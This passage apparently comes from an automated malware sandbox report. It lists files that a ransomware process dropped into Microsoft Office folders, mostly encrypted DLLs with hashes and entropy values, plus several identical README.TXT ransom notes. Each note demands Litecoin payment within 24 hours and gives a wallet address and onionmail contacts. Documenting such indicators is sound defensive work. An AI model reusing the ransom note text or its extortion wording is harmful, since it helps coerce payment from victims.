                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):23328
                                                                                                                                                                                                                                                Entropy (8bit):7.991895463701918
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:DJ+iC/Own+ML469KDZSWyvt/kL47x9ZfRMt5LwxAHfvNiibCNF0tfISCRt1cuK7x:DJ9C/jZL44LWW/kk7xjZMvLR32Nlaf+K
                                                                                                                                                                                                                                                MD5:1D7E65CC5DF425F2F06416124273B81B
                                                                                                                                                                                                                                                SHA1:2C92C84A64BBF7EEE624FA3E1BF72F1DA9BBFFD0
                                                                                                                                                                                                                                                SHA-256:774B0516164D30941F3A02C7D67D45760FACA773D58D9E6A3E7913F5DFFBCF68
                                                                                                                                                                                                                                                SHA-512:F5AF367CFC868EADB8661731F345480542276E4D151A9E8F2F36DB43B310CD7DD3A460209981B03297B744601F7FE82453F68078565016848F7C8E06D9745065
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:u?.#W3.{kV.i..BS.P.......`:2.[..%.....[....,Dw.w...H.J..?...b.I...'...->....&c>2...XGM..-.S....p.}/t.NE...Z7....h6........%[..g.C..kR...(...j...[.[.+..p......>.M.z-.f.j9.....h.IXc..I...t...1+k.A..a.(.I....;O~-..;.3.p..M..G.F}wR...<.s.#{...(%....=.X.}gl........t...T......P..N..F.8_%..5..SC.........+.Q......G..0]WY....]....x.8.+...{.izSkg.g.W.......|....K..*..q.\.c...+{.w.s.b.....4..>......9n7.-..,..k....RNn.0.........B..#....Y..r.g..yD1S6...>.....g.W...E...qO.."..d.'W~.a.../G.L....px6...r...W)(.,x?.3..F%..<.e....-~V.........pz.T!.7..5fi.I...X..V......-hK.....ID.;q.!.9.u.2..n]...B.......jY......@.~X5...X.....{:.B....~J..2.2qZ.0....;)nUK.pay...,.nD...z......."...a.,..M...4..s....V..3..7....,/E!y.....u...@S.AFx...NC.{....z..u[6..5o.Z.,..k.<,QI...)...]N.......ux=.q....Y @....(.`.IJ#+.duR?d..tJ@......z.H.g..y!.v.....]D(...'....Hq....|j`...%k.k17.Fpn1.uL..&'.K....=.}......S..E...}...i.r...s.s.%.)...s..%.4.u...?[2/.p......\.Z.a.UJ...}...

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-environment-l1-1-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):19744
                                                                                                                                                                                                                                                Entropy (8bit):7.9918837824685625
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:SqRSm9kGhNwz7T0HFguaYNYWfJZcn8J0IN/UeN1VMRMkkU:SpmZhqzHKLjqYZ4oDVMwU
                                                                                                                                                                                                                                                MD5:F1F65EB8CD4D50E5BB02840092B03F11
                                                                                                                                                                                                                                                SHA1:D79C9F8D206C332C5F27DFEBE1703E44EDE8E80A
                                                                                                                                                                                                                                                SHA-256:E5A1E84C1B15E21A97CAF9E336D35750C54FD3EBE9A75E2F4FB0515AAB498795
                                                                                                                                                                                                                                                SHA-512:C0C9A5D4A965EBE3F262F3233F9A0A1C6159EC2B412F303CF02804695614B1CF49A51DAF53CAAE272F7D851216FFBB3E2488E8FC46AD01CFDCE18F260E228256
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.w.k[6.f.Nw.3E.U..G.(.(....p....wzS_Q.H.FJ.9U&.a.....8...\.`....../.......25....a.L..Kl.\....J....i.me.).E;...F......3.d.+...^.l..J K..w..;.V.Si...y.N.I...[^g...w%f..F.W.....2.r0i.!.......B.....y....B..X.=/#..K....I.f.Hn..$.....n_..g]..'..l<....\..k.....C.K..........$../8..u....V......;........W..k..y.1...;..w.m.(&....,./lI.`(.L.JL.e.:.....A7...n.|.13hV=..b..F....j. .9>.j.....PZ.j..w.s...._..ZW...}.. ..8q.$...;......(...w....2..'v5d.8...yMr..p.8.]v......>.|Q._6Z.....l.LU......[e....h...n@Bt..@N....g.A..53'....s.[.......M..{.s...>l.x..-O.B.T...?.!8P[n....w..|6.<`.Q.....{H..Y........J../...N..........W.... ..7..Y.gL....lq.'.m(...2.....W..X...^9./a......0j.].n...u..O......<.l(....q.`*y..b..:1tp.8d%2..%..'..&u....<.HS....o.......@Z.T.A..$.I..e]......%...c.G.".a.M"......0x......|B.ku.MXK.@:O...I.2iyr....YdP.....[?3..........%...Sqa@@.....S.2. .a....m.5.7.p.3q.R.....1B.........6.\..32....~.d.....f.j...........%p..[.6..(........e...7..K.1.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):21280
                                                                                                                                                                                                                                                Entropy (8bit):7.991954287834309
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:t79aWwTjiOG8k6TeHS9iNL8f7jfDA3BvNTc5F3I1LZ:CWwST/3HpNLE3kxFc5K1LZ
                                                                                                                                                                                                                                                MD5:EFEFCB2C6219775AE2585A51FCB3C517
                                                                                                                                                                                                                                                SHA1:EE42ACC8F9E625E14D27C7BF1558FE74A40FC7FE
                                                                                                                                                                                                                                                SHA-256:774ED83863E0D42AE7F4361791EB9D4B5C6F4E9B761B3DEC2432FA3DF490465C
                                                                                                                                                                                                                                                SHA-512:F1C752673DA8354B79E7024FBDA1E32FA6B5051240130EEE781BF138DFE439276E1F12828BC24A6CCA23F7AB29A30DCD8D842D1AB1CEDDE5AD396ABE85B9D88D
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...#...d>...[aK....[-<b..k..0.z.(@z+;...rE..%.j.].m..):.^........8..K.C..E..t...>.....n7.....~.....zdE..Nx....|u.g.....y...!.N.&....4.{...1..KV...r.W.^.`...q=4...Te.?..a..c.j..?V.1....}z8...e.....I.....:....<R.\,.(.u...jD..}.r...z~.j!%...(......v..5....Y..z0.t...F...B..c$....P.H.....?........?.f.. ".>;A ..zz.....).#..?..zQ.......]Vj{p.T.+.3...&)..d..%.cM.kB.F...Y.....3........]......)...T......-4.p6GKb........b...].........K...t..r...E..`...l.......2'....v.T..N?......).4..<..|e........&w.....&.%;.._+..?.a.7..}..5.S.......n.;=$.?_...L*/e..g.........i6g.O.jt..d....N...-].."..4a#.n........h...x_$.q.c..:p.!c..J.D.o@0.(...Et..6.o>....e.9.&..}$:.1............%.j.~l;.L.....{?.....?Y.quJ..7..q..f...1[.htE..7..BZ.X.cL...U...U.g.P.V.\.#.)$..kk.......".L...t.Q=........l}.}...........P}\...F..2o.........]1.:j<G.?9T..Yl.!.2.....gp(..4>.".8hf{f.<..3............./.A....B.....m3...B.r&#.n..[.q.>A.0...Sv.v.=.+.....n.C.f......YLthG..^>[..e;..5..57.;6L.5M.|..

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20256
                                                                                                                                                                                                                                                Entropy (8bit):7.989945930059604
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:zSDL5nT77gVpbxDB4zzyG7kdPzft6sqUGsB6fT9DSwHu7B9WIvhrYh/NS9QjWCA2:zGc5Zqzh72Pzf0srz6fT9DZIB4IIc9QB
                                                                                                                                                                                                                                                MD5:83E8292F85D60AABC201991135AF6FC6
                                                                                                                                                                                                                                                SHA1:EE1C3FDC60DD1E10893909D25A2C2EE39C7357E8
                                                                                                                                                                                                                                                SHA-256:ADCA91B84ADC0175BD8E8917AB72A4CE52C904714BB8C7CBDD3AA0D5AB8A160F
                                                                                                                                                                                                                                                SHA-512:365EBA94EE58A1B7B6480124196B0DF5E4EDD644A65DE325639F22B0C9FBFBCD1F5FEF597A41C278807158C1435D6BD1C7860B936EAB21A30473D1FA30C1E7C5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:CD.P.K..X.....F.......|.=;a6...J.Ej..e....[(....Jl2E._..4....K4.GkE...1.%C-........<..= .>..&1.f.........`.]+.U...M/M...p..e....V.$...S.k.n..S...~..d5..w...e.!.M..Q..PX...<.%.M~TT.l........z..T...T..D.G.:....S9B_...M1TFl.lv(..9.3<L..o......V.Q....W.....l..A.`..3.+..e....h..S8,"D.<(.t.A...r.zU8.....5.z.W.2$<.-.\..e...o.3.....v......qMuH..c...V|1..y..[*..u..M6.....%(9<.`..\P.`....".G[ 5.G.....{\.w5....C.7..k/....J. ....8gV...._*.#..]........T.d.o.>..wq..F.=....q.~~xo.zU%.......X.....?IB.....X................Z...6.J}...;f...P.S.!!.Dus.i.o...y&.Z....3.........Q.....qa...i..p..UbJw....U(...$..........l>..m.......z..P.QFz.q...].8...3.k..G.........Zn.u6N.w..H.f.EC.On6....J.V@.1<s.t.$.]Y..*o.Cn&.'?.._.....^q<.N)3BY...L.>....bc...B.?CJ'..aHWZ.~j]U..a$...QS.g.Y.......e-:...1..].J.X.T.a..?PK.9$/......ykC..N........0.X.....u..I..b).0q*.3..=s...."...R/.7..=.kq.N.0.{:.p.;k.-."..AG.x..4....U.-....}.e...h!.y..B.......(..r..gJ.....c.9wqH8."...=$...R...

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-math-l1-1-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):29984
                                                                                                                                                                                                                                                Entropy (8bit):7.993438107572493
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:5m4aBeIB3mrfX4nNZWWA4j8PEdO7eogqoGLFrD1Xt20:5SBXArfXuZOr8dO7ejqnLdV
                                                                                                                                                                                                                                                MD5:6B03ADB3B75D2E5136FCDEF50517F880
                                                                                                                                                                                                                                                SHA1:1D86F22CAFA7462F8E95EB4171898D9167D1109A
                                                                                                                                                                                                                                                SHA-256:B257BF0DBC446447B34268F5D25E67703787C6634F9624A117ABF4FB8C5432D0
                                                                                                                                                                                                                                                SHA-512:9157C37D8535626E8B20B117185ADA28831D012B3B5E3EA6DFCED54421A3ACC5E6D2BD9B8765A6D5E08830C9C4D56C116AA1CB701E4ED73B5B5547B402D9119B
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..Av.m..t...%...@......Uf|@.D{Lj6`.m.*....."Y+G1.s^.v.<.dQ..F.1....V|J/(....6..\...?.dZ........y=..W.k...\.V.Y..1<y.T..U...a..3t.w+p3*<..(.....j.]T........=...O9..K\..4w..'....)..x.?.*.{6..V.....o...h.|VJ.....7.9.9.X....5.N);\.m..&.x../....d*.N..]'=..f..2Y.Kl.9N.3_.X....Y.G=..45/B...Z8>...U..(.....5.n;.F.........6.....~d.`.<..'.(d...I..f........T.`x..K+^u.K....O...4.m........{s....,.k.f"{h...p....Jfp.}.g.{...`....W...^7....`..D.Mj..f.D.......x..VV......F....,.#.j...1.bL.v8.8..r...\.K......pz...=............o.M......UF.W...4.S..=.4{..u&.,...V...t.\4.q......S..I.....r...u.W:.....(/h.P....<..@}p>MI....;.T.2..Z..->lv....$.B...::....a".8...7..8.m;...B4..pM8.y...2.....t...!.N..qTm...f....`..cm.........U........z..\.ZT..e..n.r=...{'..6...X..L: j.E...px..u.~....Z...\<0....G....X..6..O.:%.f.G.7x.$.......wN.n.F..G.b..ei.... X.WU....R.&..JGc}...Z.w..J..5#kZ........B..:uj..*g.C.H..I|.5."..^lQfA..@=8...'q.Zr'.g..a..IP\N.0..O.=.....o..Q....,.........

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-multibyte-l1-1-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):27424
                                                                                                                                                                                                                                                Entropy (8bit):7.992369101632717
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:VxeraggXS3Lkk+hVWQ/FPyoM+IYvctT9yBh:VYagCqAz9PyoMPYyT0
                                                                                                                                                                                                                                                MD5:0D1B7077C8E91C93553C34FA8DAD46B6
                                                                                                                                                                                                                                                SHA1:45CB2A99E05298103056D2B56A9E382FFD55D963
                                                                                                                                                                                                                                                SHA-256:78D83B3ECD6C8F8BF5A95AE9487F20E4DB9399472A4678CB2B145544AEE74021
                                                                                                                                                                                                                                                SHA-512:F6C4E175F4336411D471E4A0B8F5A757358ED9BE67275D9D32C5F136B17EAFF6023E903A11B6300711F059D57162479E336A7A5B95F5BDAF0E625942A22993C2
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..*UjG..^._.E"..!...6.)...v../j../..^..1YP....H..l`n.......b...g.U......./....K...6.....u.z.ow.B.A...Z.,$..........i;....y#K2...x.up.+...T..g......u0.6/.....y.H.S.C.;F..nB.".~J=V]O.....X$..?<.3*2..#Q...V.j.P.8Y.oU.5<.*.:...B.O_.T....k........]{.(..2.p..n.}l.......M,....71.b..;N.....@\w...............6.,9._....|.r=.`..9). ...q..9'ET.'....U...b..H...6....mh)..0....l..... ...8..af..$.:...4.H.c..8...[..5...;w/.g._..E..Evm..yh.r.s...D..e.p.~~....^.....M..?.a.O .k..M..a.k....3#n.[d....O.>'.@9..D....=|...R|.....Vh-g.LF. 99..C.....ma....?.7.+[h...MJV..'......k[.t.-...5.C.*...vr...'.#:X.i...P.qWv.4..\XD.....U#..(.L.|j=..@..j..h.*..|Z+p.P#:T.V...N...k.8...l.6K>RUa._.Cj.j.r7.a....U..,T.d..,wo#.../......Pl.:..."..&.....1.......s...h..G....1..;.........(..UC.'..+.]...7....]..r.HQ......h.....a<a...e.E...R;......} [.C.d.9..f.....8...:.h.Sd.,..e.I..R.T..k.e...4.<._..a...a.Hp.k.#.R...kR.,...M....?dQL6.@`.P.}`[.l.G...^..$q...b......\5C.H..S./ft..s.M.5.l.)o....t

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-private-l1-1-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):74016
                                                                                                                                                                                                                                                Entropy (8bit):7.997737977116611
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:BdFUQdVvEAf2YHzVHWjTZsyYfFwZNxd+act4RvRQK9Q:XFDvEAf2YT6T/YfGVwact4ZGv
                                                                                                                                                                                                                                                MD5:C55161218504122A4F6B19F6544647FF
                                                                                                                                                                                                                                                SHA1:C57196BAEB7C44BCAF706847A8C3811ABDED6339
                                                                                                                                                                                                                                                SHA-256:00D841D349BF9BAA7DD63AB9CFAEC5CFC62E471D101835395F54159EB4B3AF1E
                                                                                                                                                                                                                                                SHA-512:39B303B7294689B63765F3A4167861C06FCC6823325A5CAD8164887EABF9A5B00E7639823CB94BFD34A2336C8B848BD89660E5B79F7C3ACB740DB783D96A71E6
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....H.b.mi.+._>...L.&....X.......H.q._.[.(x[.|!..Q<"...n..cr..1(..e\...e^-...6.........`..@h....Hd....."....W...auZ.75..\0V....K>.}.(.OA...F..Z.15'r8.e..#......z..\........Bn..b.q$[...(.U...*...A.N....~....q....!.....1S.<.>....:k*+.x+...A-w#@y..m.)...z.....Y}.P\.....f#"2B.G......(.. }sb+g.S.).P..}...O.sW..H[......B..+......d.;^.t.........0.E./j..-.[ ls".y..lW+....g..W.8R.gB.IS...../.K....!....-P2.d~...%i;.~c..".k.X....S..."b...R...{6dI./....#....f.aH.Gl.$..Ly.......+j.b.yP....4..._...18.....*....tYP...o......<.S...tY.a!l!k.).n.D.S.0.....&a.N.63....x.... ..%.......V.Tzp.y.(.X...._F..B....8..j..D.%.....N}...(C............'.P.;.....rM..'5......u..|Dd..Id..}}.....hY.B~...R...41t.Z.#.s...m.y~}d..b.....el...W..+.2<+.....6.S..'~..6..j..s..c$.....h.....t.,.....5.pqP.tpq..i....z..4...`a.cT^..G.W.....E...q....>....w.1....y..g0..Su....D.xu~'.c.T....Nr}t-.h.xb.Q..jZ.x.Jo.....P...z$..I.Z....zs../.L....E.......'......./...N..]\]...p.T_M.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-process-l1-1-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20256
                                                                                                                                                                                                                                                Entropy (8bit):7.991024109979439
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:P9mQ3khUXLGv+Yfn8LY3juBqrbGloCpUM6GL3EiAXyYXLxhCOL+A:PkQ3RX8VPx3juBMb7MSXBidA
                                                                                                                                                                                                                                                MD5:646BBCDB41D8083D4590CA51569173C7
                                                                                                                                                                                                                                                SHA1:265BC784759766E8C7AB96B8041C076DB4847144
                                                                                                                                                                                                                                                SHA-256:EA663962119EBBCCA701C32BBDE09A67C439F905BB77D2074B09CD4D0DDFD688
                                                                                                                                                                                                                                                SHA-512:F01CFF5F8BE3DC9E3178FE581B3270B88A3FEE5B33076F27CA0303DEDE88948EAAF900F982C595F4240B7DEF436E0A4AB47B299286E476BA57596C9BFEE626C2
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:w.J...n.Z.k.R.S0&=.~. n.....N.;......,...%._.bAf....h...5.f..]wrQ.....x..\......n..v.2i..0SA...m[m.b... F.k...O...J.M...x...B...9.qx!"#.d)'.......p..^g.....,....A..Y....t.".w.....\..N.s.?........5.G....>..T!..._@d...WM..9_..p.k. ..r..}..N...V.O."d..Y.b.].f..L':..s..c"..T.%+..I?$.F.}../X.hI.....J.....m+...T..u...k..W9G..'ZpFZ.b&}.#.<...`..>.o-..j5x......f...\....+.t..;&....s./.m+V)V.8!....qX..4l...~.R..!.......@H...S@1.yC..m..I.j.g.?..l...-........d.T.*...D...`./..M9.X.M9...{..b....`y.._..q.+...Ju..2..Oa...,~...W..QL..V..^.X..I......{&.../{.h...."&l.=.....@.....2...X.I..D.i.f.A..{...2.z.-N.J...../..Er....<...?[......UA.Q.g.Ro#a.`{G.cyj+.....p...)../.3..B.T|].IUj....].DJ.d....Q..x.$B......N.@o:fF^.....er.X....Jp..V.T..J..o...X..\.....q .o.>L($.....\q..`k...2..G*j...;..Q.V.q..Q.u.q.RsoA."..IR.G.v....xG.y,..&..N`.....l.B.T....Y5ny.>.....^..k#z.n.I.B.c.~G.;D.>.L...?.n.4.".....'E...L%.WY"P$$v.G......4...U..1.&-w..>2..\b3.\/5.f.<..n

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):23840
                                                                                                                                                                                                                                                Entropy (8bit):7.992087794464506
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:Wz7oC42MbjKxsl5Bbxck97ptwANB8CsEbK2L62tY6oEVSRqxO7Ta9gXjPhA4sLTL:QMl2Mn/l5fck9Ntw+B5syKSu6Rx0PjPM
                                                                                                                                                                                                                                                MD5:F433F5F9D4D1F4B9713BD30864A0BA3D
                                                                                                                                                                                                                                                SHA1:05AF3863440E42F1F2CD678945852533A918CBA8
                                                                                                                                                                                                                                                SHA-256:9154563AF886E1853C48B5DCBC8EC159C9746D4B368B710C3E3EF632257B12B9
                                                                                                                                                                                                                                                SHA-512:FFAA81EE6B35149F786059351A097143651F549EB4CE05D4F6502C1D07A810EF033EB4AA2BE9209F670C27B0DDC93E0D8DCE0CED0CA205766F8D83CA9781C6BB
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..|..a.l._/.xeC.y..gR.....d...K.DI.....B%...d..M=.`.R.W...H2}..I...4....._..&.%O..3..@i\y.O.P..T..e..B.{.|.%.#*.....`o....9.......@.nd.%.U........{.P...0.....l2...u.>.Z!..._....b......u.U.".f{........Z.'...+.W.6....g....7s.tf..>....u.."U.....u....`^..f..,.........U.ob.......nKI"[7.N..s.z....;.-Qfw4.@.h..a6.N..I.8u_.O..7o.j...eH..6E%5...U".Z;6._9..E.Lv]....Dg.ti.5.4.#R..G&..jX%....Q"...K:.L.+(.r2.-?%...qp.l..k......... B...[.W0....?..-.w."..{..kl...Y.....r...%[...b......K.?W........:...6R......%W>I.]i)/^.n.?..}.g..A.DW.t...(xj.g`.?:...7.e,B.[.......rO......O.....y@;..P.,?...'.).d...b5..f....BVKn;/.....b..b..!.c.*...Wp....8.a*!,H{.f......5r3....(b)..?t.G.....|..I.o=<.%Y.?.:XN.....1B.0.4....l...q...."..............%.9.XU.[... ..,.Q7.}%C.A1i...s.4K...;.............F.&.(W..PF]....<...<.)2Cn..23O.G...0.kqb........+..M....7.....M....;...$#.;5.f:.i.QN# ...Z.}..Q..x...aH.....O.JFh.c..k...K...~8....LHg8L 3..|..X+W..$to..".\DK&9.S.:2.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Integration\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Licenses16\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Licenses\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
